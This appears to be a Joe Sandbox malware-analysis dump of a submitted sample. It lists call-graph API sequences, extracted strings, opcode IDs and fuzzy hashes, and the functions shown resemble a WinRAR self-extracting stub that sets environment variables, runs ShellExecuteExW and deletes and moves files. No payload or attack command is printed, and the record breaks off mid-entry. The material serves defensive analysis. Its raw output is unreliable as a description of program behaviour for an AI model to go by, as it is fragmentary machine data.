25158->25162 25160 a3a9c8 25160->25161 25161->25154 25162->25160 25163->24898 25165 a3a6a8 25164->25165 25166 a3a6c1 FindFirstFileW 25165->25166 25167 a3a727 FindNextFileW 25165->25167 25169 a3a6d0 25166->25169 25174 a3a709 25166->25174 25168 a3a732 GetLastError 25167->25168 25167->25174 25168->25174 25170 a3bb03 GetCurrentDirectoryW 25169->25170 25171 a3a6e0 25170->25171 25172 a3a6e4 FindFirstFileW 25171->25172 25173 a3a6fe GetLastError 25171->25173 25172->25173 25172->25174 25173->25174 25174->24749 25175->24556 25176->24560 25177->24560 25178->24563 25179->24571 25181 a39f42 78 API calls 25180->25181 25182 a31fe8 25181->25182 25183 a31a04 101 API calls 25182->25183 25186 a32005 25182->25186 25184 a31ff5 25183->25184 25184->25186 25187 a3138b 74 API calls 25184->25187 25186->24579 25186->24580 25187->25186 25189 a4b583 GetMessageW 25188->25189 25190 a4b5bc GetDlgItem 25188->25190 25191 a4b5a8 TranslateMessage DispatchMessageW 25189->25191 25192 a4b599 IsDialogMessageW 25189->25192 25190->24590 25190->24591 25191->25190 25192->25190 25192->25191 25357 a494e0 GetClientRect 25389 a421e0 26 API calls std::bad_exception::bad_exception 25409 a4f2e0 46 API calls __RTC_Initialize 25410 a5bee0 GetCommandLineA GetCommandLineW 25390 a3f1e8 FreeLibrary 25391 a395f0 80 API calls 25411 a35ef0 82 API calls 25200 a598f0 25208 a5adaf 25200->25208 25203 a59904 25205 a5990c 25206 a59919 25205->25206 25216 a59920 11 API calls 25205->25216 25209 a5ac98 __dosmaperr 5 API calls 25208->25209 25210 a5add6 25209->25210 25211 a5addf 25210->25211 25212 a5adee TlsAlloc 25210->25212 25213 a4fbbc CatchGuardHandler 5 API calls 25211->25213 25212->25211 25214 a598fa 25213->25214 25214->25203 25215 a59869 20 API calls 2 library calls 25214->25215 25215->25205 25216->25203 25217 a5abf0 25218 a5abfb 25217->25218 25219 a5af0a 11 API calls 25218->25219 25220 a5ac24 25218->25220 25221 a5ac20 25218->25221 25219->25218 25223 a5ac50 DeleteCriticalSection 25220->25223 25223->25221 25358 a588f0 7 API calls ___scrt_uninitialize_crt 25393 a4fd4f 9 API calls 2 library calls 25360 a52cfb 38 API calls 4 library calls 25394 a4b5c0 100 API calls 25430 a477c0 118 API calls 25431 a4ffc0 RaiseException _com_raise_error _com_error::_com_error 25250 a4dec2 25251 a4decf 25250->25251 25252 a3e617 53 API calls 25251->25252 25253 a4dedc 25252->25253 25254 a34092 _swprintf 51 API calls 25253->25254 25255 a4def1 SetDlgItemTextW 25254->25255 25256 a4b568 5 API calls 25255->25256 25257 a4df0e 25256->25257 25413 a462ca 123 API calls __InternalCxxFrameHandler 25264 a4e2d7 25266 a4e1db 25264->25266 25265 a4e85d ___delayLoadHelper2@8 14 API calls 25265->25266 25266->25265 25269 a4e1d1 14 API calls ___delayLoadHelper2@8 25433 a5a3d0 21 API calls 2 library calls 25270 a310d5 25275 a35abd 25270->25275 25276 a35ac7 __EH_prolog 25275->25276 25277 a3b505 84 API calls 25276->25277 25278 a35ad3 25277->25278 25282 a35cac GetCurrentProcess GetProcessAffinityMask 25278->25282 25434 a62bd0 VariantClear 25362 a4f4d3 20 API calls 25415 a50ada 51 API calls 2 library calls 25363 a5f421 21 API calls __vsnwprintf_l 25416 a4c220 93 API calls _swprintf 25365 a31025 29 API calls 25396 a5b4ae 27 API calls CatchGuardHandler 25397 a4f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25436 a4ff30 LocalFree 23464 a5bb30 23465 a5bb39 23464->23465 23466 a5bb42 23464->23466 23468 a5ba27 23465->23468 23488 a597e5 GetLastError 23468->23488 23470 a5ba34 23508 a5bb4e 23470->23508 23472 a5ba3c 23517 a5b7bb 23472->23517 23475 a5ba53 23475->23466 23478 a5ba96 23542 a58dcc 23478->23542 23482 a5ba91 23541 a591a8 20 API calls __dosmaperr 23482->23541 23484 a5bada 23484->23478 23548 a5b691 26 API calls 23484->23548 23485 a5baae 23485->23484 23486 a58dcc _free 20 API calls 23485->23486 23486->23484 23489 a59801 23488->23489 23490 a597fb 23488->23490 23494 a59850 SetLastError 23489->23494 23550 a5b136 23489->23550 23549 a5ae5b 11 API calls 2 library calls 23490->23549 23494->23470 23496 a58dcc _free 20 API calls 23498 a59821 23496->23498 23497 a59830 23499 a5981b 23497->23499 23500 a59837 23497->23500 23501 a5985c SetLastError 23498->23501 23499->23496 23558 a59649 20 API calls __dosmaperr 23500->23558 23559 a58d24 38 API calls _abort 23501->23559 23503 a59842 23505 a58dcc _free 20 API calls 23503->23505 23507 a59849 23505->23507 23507->23494 23507->23501 23509 a5bb5a __FrameHandler3::FrameUnwindToState 23508->23509 23510 a597e5 _unexpected 38 API calls 23509->23510 23512 a5bb64 23510->23512 23515 a5bbe8 _abort 23512->23515 23516 a58dcc _free 20 API calls 23512->23516 23562 a58d24 38 API calls _abort 23512->23562 23563 a5ac31 EnterCriticalSection 23512->23563 23564 a5bbdf LeaveCriticalSection _abort 23512->23564 23515->23472 23516->23512 23565 a54636 23517->23565 23520 a5b7dc GetOEMCP 23522 a5b805 23520->23522 23521 a5b7ee 23521->23522 23523 a5b7f3 GetACP 23521->23523 23522->23475 23524 a58e06 23522->23524 23523->23522 23525 a58e44 23524->23525 23529 a58e14 __dosmaperr 23524->23529 23576 a591a8 20 API calls __dosmaperr 23525->23576 23526 a58e2f RtlAllocateHeap 23528 a58e42 23526->23528 23526->23529 23528->23478 23531 a5bbf0 23528->23531 23529->23525 23529->23526 23575 a57a5e 7 API calls 2 library calls 23529->23575 23532 a5b7bb 40 API calls 23531->23532 23533 a5bc0f 23532->23533 23535 a5bc60 IsValidCodePage 23533->23535 23538 a5bc16 23533->23538 23539 a5bc85 __cftof 23533->23539 23537 a5bc72 GetCPInfo 23535->23537 23535->23538 23536 a5ba89 23536->23482 23536->23485 23537->23538 23537->23539 23587 a4fbbc 23538->23587 23577 a5b893 GetCPInfo 23539->23577 23541->23478 23543 a58e00 _free 23542->23543 23544 a58dd7 RtlFreeHeap 23542->23544 23543->23475 23544->23543 23545 a58dec 23544->23545 23668 a591a8 20 API calls __dosmaperr 23545->23668 23547 a58df2 GetLastError 23547->23543 23548->23478 23549->23489 23555 a5b143 __dosmaperr 23550->23555 23551 a5b183 23561 a591a8 20 API calls __dosmaperr 23551->23561 23552 a5b16e RtlAllocateHeap 23553 a59813 23552->23553 23552->23555 23553->23499 23557 a5aeb1 11 API calls 2 library calls 23553->23557 23555->23551 23555->23552 23560 a57a5e 7 API calls 2 library calls 23555->23560 23557->23497 23558->23503 23560->23555 23561->23553 23563->23512 23564->23512 23566 a54653 23565->23566 23572 a54649 23565->23572 23567 a597e5 _unexpected 38 API calls 23566->23567 23566->23572 23568 a54674 23567->23568 23573 a5993a 38 API calls __cftof 23568->23573 23570 a5468d 23574 a59967 38 API calls __cftof 23570->23574 23572->23520 23572->23521 23573->23570 23574->23572 23575->23529 23576->23528 23583 a5b8cd 23577->23583 23586 a5b977 23577->23586 23580 a4fbbc CatchGuardHandler 5 API calls 23582 a5ba23 23580->23582 23582->23538 23594 a5c988 23583->23594 23585 a5ab78 __vsnwprintf_l 43 API calls 23585->23586 23586->23580 23588 a4fbc4 23587->23588 23589 a4fbc5 IsProcessorFeaturePresent 23587->23589 23588->23536 23591 a4fc07 23589->23591 23667 a4fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23591->23667 23593 a4fcea 23593->23536 23595 a54636 __cftof 38 API calls 23594->23595 23596 a5c9a8 MultiByteToWideChar 23595->23596 23598 a5ca7e 23596->23598 23599 a5c9e6 23596->23599 23600 a4fbbc CatchGuardHandler 5 API calls 23598->23600 23602 a58e06 __vsnwprintf_l 21 API calls 23599->23602 23605 a5ca07 __cftof __vsnwprintf_l 23599->23605 23603 a5b92e 23600->23603 23601 a5ca78 23613 a5abc3 20 API calls _free 23601->23613 23602->23605 23608 a5ab78 23603->23608 23605->23601 23606 a5ca4c MultiByteToWideChar 23605->23606 23606->23601 23607 a5ca68 GetStringTypeW 23606->23607 23607->23601 23609 a54636 __cftof 38 API calls 23608->23609 23610 a5ab8b 23609->23610 23614 a5a95b 23610->23614 23613->23598 23615 a5a976 __vsnwprintf_l 23614->23615 23616 a5a99c MultiByteToWideChar 23615->23616 23617 a5a9c6 23616->23617 23618 a5ab50 23616->23618 23621 a58e06 __vsnwprintf_l 21 API calls 23617->23621 23625 a5a9e7 __vsnwprintf_l 23617->23625 23619 a4fbbc CatchGuardHandler 5 API calls 23618->23619 23620 a5ab63 23619->23620 23620->23585 23621->23625 23622 a5aa30 MultiByteToWideChar 23623 a5aa9c 23622->23623 23624 a5aa49 23622->23624 23650 a5abc3 20 API calls _free 23623->23650 23641 a5af6c 23624->23641 23625->23622 23625->23623 23629 a5aa73 23629->23623 23632 a5af6c __vsnwprintf_l 11 API calls 23629->23632 23630 a5aaab 23631 a58e06 __vsnwprintf_l 21 API calls 23630->23631 23634 a5aacc __vsnwprintf_l 23630->23634 23631->23634 23632->23623 23633 a5ab41 23649 a5abc3 20 API calls _free 23633->23649 23634->23633 23635 a5af6c __vsnwprintf_l 11 API calls 23634->23635 23637 a5ab20 23635->23637 23637->23633 23638 a5ab2f WideCharToMultiByte 23637->23638 23638->23633 23639 a5ab6f 23638->23639 23651 a5abc3 20 API calls _free 23639->23651 23652 a5ac98 23641->23652 23645 a5afdc LCMapStringW 23646 a5af9c 23645->23646 23647 a4fbbc CatchGuardHandler 5 API calls 23646->23647 23648 a5aa60 23647->23648 23648->23623 23648->23629 23648->23630 23649->23623 23650->23618 23651->23623 23653 a5acc8 23652->23653 23657 a5acc4 23652->23657 23653->23646 23659 a5aff4 10 API calls 3 library calls 23653->23659 23654 a5ace8 23654->23653 23656 a5acf4 GetProcAddress 23654->23656 23658 a5ad04 __dosmaperr 23656->23658 23657->23653 23657->23654 23660 a5ad34 23657->23660 23658->23653 23659->23645 23661 a5ad55 LoadLibraryExW 23660->23661 23666 a5ad4a 23660->23666 23662 a5ad72 GetLastError 23661->23662 23663 a5ad8a 23661->23663 23662->23663 23664 a5ad7d LoadLibraryExW 23662->23664 23665 a5ada1 FreeLibrary 23663->23665 23663->23666 23664->23663 23665->23666 23666->23657 23667->23593 23668->23547 25368 a5c030 GetProcessHeap 25369 a4a400 GdipDisposeImage GdipFree 25417 a4d600 70 API calls 25370 a56000 QueryPerformanceFrequency QueryPerformanceCounter 25400 a52900 6 API calls 4 library calls 25418 a5f200 51 API calls 25438 a5a700 21 API calls 25439 a31710 86 API calls 25403 a4ad10 73 API calls 25441 a57f6e 52 API calls 2 library calls 25419 a58268 55 API calls _free 25374 a4c793 107 API calls 4 library calls 25442 a31f72 128 API calls __EH_prolog 25375 a4a070 10 API calls 25420 a4b270 99 API calls 25377 a31075 84 API calls 25225 a39a74 25229 a39a7e 25225->25229 25226 a39ab1 25227 a39b9d SetFilePointer 25227->25226 25228 a39bb6 GetLastError 25227->25228 25228->25226 25229->25226 25229->25227 25230 a39b79 25229->25230 25231 a3981a 79 API calls 25229->25231 25230->25227 25231->25230 25233 a39f7a 25234 a39f88 25233->25234 25235 a39f8f 25233->25235 25236 a39f9c GetStdHandle 25235->25236 25243 a39fab 25235->25243 25236->25243 25237 a3a003 WriteFile 25237->25243 25238 a39fd4 WriteFile 25239 a39fcf 25238->25239 25238->25243 25239->25238 25239->25243 25241 a3a095 25245 a36e98 77 API calls 25241->25245 25243->25234 25243->25237 25243->25238 25243->25239 25243->25241 25244 a36baa 78 API calls 25243->25244 25244->25243 25245->25234 25379 a4a440 GdipCloneImage GdipAlloc 25421 a53a40 5 API calls CatchGuardHandler 25444 a61f40 CloseHandle 25381 a4e455 14 API calls ___delayLoadHelper2@8 25267 a5c051 31 API calls CatchGuardHandler 25285 a4cd58 25286 a4ce22 25285->25286 25290 a4cd7b 25285->25290 25299 a4c793 _wcslen _wcsrchr 25286->25299 25313 a4d78f 25286->25313 25287 a4b314 ExpandEnvironmentStringsW 25287->25299 25289 a4d40a 25290->25286 25292 a41fbb CompareStringW 25290->25292 25292->25290 25293 a4ca67 SetWindowTextW 25293->25299 25296 a53e3e 22 API calls 25296->25299 25298 a4c855 SetFileAttributesW 25300 a4c90f GetFileAttributesW 25298->25300 25311 a4c86f __cftof _wcslen 25298->25311 25299->25287 25299->25289 25299->25293 25299->25296 25299->25298 25304 a4cc31 GetDlgItem SetWindowTextW SendMessageW 25299->25304 25307 a4cc71 SendMessageW 25299->25307 25312 a41fbb CompareStringW 25299->25312 25337 a4a64d GetCurrentDirectoryW 25299->25337 25339 a3a5d1 6 API calls 25299->25339 25340 a3a55a FindClose 25299->25340 25341 a4b48e 76 API calls 2 library calls 25299->25341 25300->25299 25302 a4c921 DeleteFileW 25300->25302 25302->25299 25305 a4c932 25302->25305 25304->25299 25306 a34092 _swprintf 51 API calls 25305->25306 25308 a4c952 GetFileAttributesW 25306->25308 25307->25299 25308->25305 25309 a4c967 MoveFileW 25308->25309 25309->25299 25310 a4c97f MoveFileExW 25309->25310 25310->25299 25311->25299 25311->25300 25338 a3b991 51 API calls 2 library calls 25311->25338 25312->25299 25314 a4d799 __cftof _wcslen 25313->25314 25315 a4d9c0 25314->25315 25316 a4d8a5 25314->25316 25318 a4d9e7 25314->25318 25342 a41fbb CompareStringW 25314->25342 25315->25318 25321 a4d9de ShowWindow 25315->25321 25317 a3a231 3 API calls 25316->25317 25320 a4d8ba 25317->25320 25318->25299 25322 a4d8d9 ShellExecuteExW 25320->25322 25343 a3b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25320->25343 25321->25318 25322->25318 25329 a4d8ec 25322->25329 25324 a4d8d1 25324->25322 25325 a4d925 25344 a4dc3b 6 API calls 25325->25344 25326 a4d97b CloseHandle 25327 a4d994 25326->25327 25328 a4d989 25326->25328 25327->25315 25345 a41fbb CompareStringW 25328->25345 25329->25325 25329->25326 25332 a4d91b ShowWindow 25329->25332 25332->25325 25333 a4d93d 25333->25326 25334 a4d950 GetExitCodeProcess 25333->25334 25334->25326 25335 a4d963 25334->25335 25335->25326 25337->25299 25338->25311 25339->25299 25340->25299 25341->25299 25342->25316 25343->25324 25344->25333 25345->25327

                                                                                            Executed Functions

                                                                                            Function 00A4DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00A40863: GetModuleHandleW.KERNEL32(kernel32), ref: 00A4087C
                                                                                              • Part of subcall function 00A40863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A4088E
                                                                                              • Part of subcall function 00A40863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A408BF
                                                                                              • Part of subcall function 00A4A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00A4A655
                                                                                              • Part of subcall function 00A4AC16: OleInitialize.OLE32(00000000), ref: 00A4AC2F
                                                                                              • Part of subcall function 00A4AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A4AC66
                                                                                              • Part of subcall function 00A4AC16: SHGetMalloc.SHELL32(00A78438), ref: 00A4AC70
                                                                                            • GetCommandLineW.KERNEL32 ref: 00A4DF5C
                                                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00A4DF83
                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00A4DF94
                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00A4DFCE
                                                                                              • Part of subcall function 00A4DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00A4DBF4
                                                                                              • Part of subcall function 00A4DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A4DC30
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A4DFD7
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00A8EC90,00000800), ref: 00A4DFF2
                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,00A8EC90), ref: 00A4DFFE
                                                                                            • GetLocalTime.KERNEL32(?), ref: 00A4E009
                                                                                            • _swprintf.LIBCMT ref: 00A4E048
                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A4E05A
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00A4E061
                                                                                            • LoadIconW.USER32(00000000,00000064), ref: 00A4E078
                                                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00A4E0C9
                                                                                            • Sleep.KERNEL32(?), ref: 00A4E0F7
                                                                                            • DeleteObject.GDI32 ref: 00A4E130
                                                                                            • DeleteObject.GDI32(?), ref: 00A4E140
                                                                                            • CloseHandle.KERNEL32 ref: 00A4E183
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                            • API String ID: 3049964643-3743209390
                                                                                            • Opcode ID: b97ce652bec48d4acb734c7133d3098b4ebc42c4648c2d2c7201cd8e308bbf03
                                                                                            • Instruction ID: 83dcd1a9cec16fda543c862890a4d986b1e744615a4dc7608b1bb2cda8678353
                                                                                            • Opcode Fuzzy Hash: b97ce652bec48d4acb734c7133d3098b4ebc42c4648c2d2c7201cd8e308bbf03
                                                                                            • Instruction Fuzzy Hash: 6E61F3B5944245BFD720EBF8AD49F2B37ACBB85740F00042AF94A92191DBB8994AC761
                                                                                            Function 00A4A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 812 a4a6c2-a4a6df FindResourceW 813 a4a6e5-a4a6f6 SizeofResource 812->813 814 a4a7db 812->814 813->814 816 a4a6fc-a4a70b LoadResource 813->816 815 a4a7dd-a4a7e1 814->815 816->814 817 a4a711-a4a71c LockResource 816->817 817->814 818 a4a722-a4a737 GlobalAlloc 817->818 819 a4a7d3-a4a7d9 818->819 820 a4a73d-a4a746 GlobalLock 818->820 819->815 821 a4a7cc-a4a7cd GlobalFree 820->821 822 a4a74c-a4a76a call a50320 CreateStreamOnHGlobal 820->822 821->819 825 a4a7c5-a4a7c6 GlobalUnlock 822->825 826 a4a76c-a4a78e call a4a626 822->826 825->821 826->825 831 a4a790-a4a798 826->831 832 a4a7b3-a4a7c1 831->832 833 a4a79a-a4a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 a4a7b0 833->834 834->832
                                                                                            APIs
                                                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6D5
                                                                                            • SizeofResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6EC
                                                                                            • LoadResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A703
                                                                                            • LockResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A712
                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A4B73D,00000066), ref: 00A4A72D
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00A4A73E
                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A4A762
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00A4A7C6
                                                                                              • Part of subcall function 00A4A626: GdipAlloc.GDIPLUS(00000010), ref: 00A4A62C
                                                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A4A7A7
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00A4A7CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                            • String ID: PNG
                                                                                            • API String ID: 211097158-364855578
                                                                                            • Opcode ID: b026489a0cc405d96a49453a10053e2aa9b97946ce30f00aaf20a89809385461
                                                                                            • Instruction ID: 2ea166f465e4a70873d2a3f5aef47e1498ba644524afcfc88ae2f76580cd959a
                                                                                            • Opcode Fuzzy Hash: b026489a0cc405d96a49453a10053e2aa9b97946ce30f00aaf20a89809385461
                                                                                            • Instruction Fuzzy Hash: 7E31A47A640302AFDB20DF61DC48D2BBBB9FFD5751B044619F805C2620EB71DD46DA61
                                                                                            Function 00A3A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1029 a3a69b-a3a6bf call a4ec50 1032 a3a6c1-a3a6ce FindFirstFileW 1029->1032 1033 a3a727-a3a730 FindNextFileW 1029->1033 1034 a3a742-a3a7ff call a40602 call a3c310 call a415da * 3 1032->1034 1036 a3a6d0-a3a6e2 call a3bb03 1032->1036 1033->1034 1035 a3a732-a3a740 GetLastError 1033->1035 1040 a3a804-a3a811 1034->1040 1037 a3a719-a3a722 1035->1037 1044 a3a6e4-a3a6fc FindFirstFileW 1036->1044 1045 a3a6fe-a3a707 GetLastError 1036->1045 1037->1040 1044->1034 1044->1045 1047 a3a717 1045->1047 1048 a3a709-a3a70c 1045->1048 1047->1037 1048->1047 1050 a3a70e-a3a711 1048->1050 1050->1047 1052 a3a713-a3a715 1050->1052 1052->1037
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6C4
                                                                                              • Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27
                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6F2
                                                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6FE
                                                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A728
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A734
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 42610566-0
                                                                                            • Opcode ID: 1ed85acf21d37da803d196b7b0c91b16e4d34aaa6aae12fd8d2f150b688d748f
                                                                                            • Instruction ID: d73ff8fa1445ea0d2ba80239bb435bedab12649af717968629178aa829a956c5
                                                                                            • Opcode Fuzzy Hash: 1ed85acf21d37da803d196b7b0c91b16e4d34aaa6aae12fd8d2f150b688d748f
                                                                                            • Instruction Fuzzy Hash: 35417D76900125ABCB25DF64CCC4AE9B7B8FB59350F104196F5AEE3200D7346E95CF91
                                                                                            Function 00A57DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000000,?,00A57DC4,00000000,00A6C300,0000000C,00A57F1B,00000000,00000002,00000000), ref: 00A57E0F
                                                                                            • TerminateProcess.KERNEL32(00000000,?,00A57DC4,00000000,00A6C300,0000000C,00A57F1B,00000000,00000002,00000000), ref: 00A57E16
                                                                                            • ExitProcess.KERNEL32 ref: 00A57E28
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: b4149744fe7555dc41760f5575ca033404f663f863e528ea87394fa83ccc860d
                                                                                            • Instruction ID: cb9e0e7ac2f0916cd12161801728a03b4697f4f5d7d5d2efb0f887e36dd81040
                                                                                            • Opcode Fuzzy Hash: b4149744fe7555dc41760f5575ca033404f663f863e528ea87394fa83ccc860d
                                                                                            • Instruction Fuzzy Hash: 7DE0BF32004244ABCF11AF54DD0A9497F79FF50342B014454FC15AA172CB75DE5BCA90
                                                                                            Function 00A3848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 815c8d05e46b950f8a647f0b3bdd5ac72a4b2850899bbdd942a792a1b1c19d35
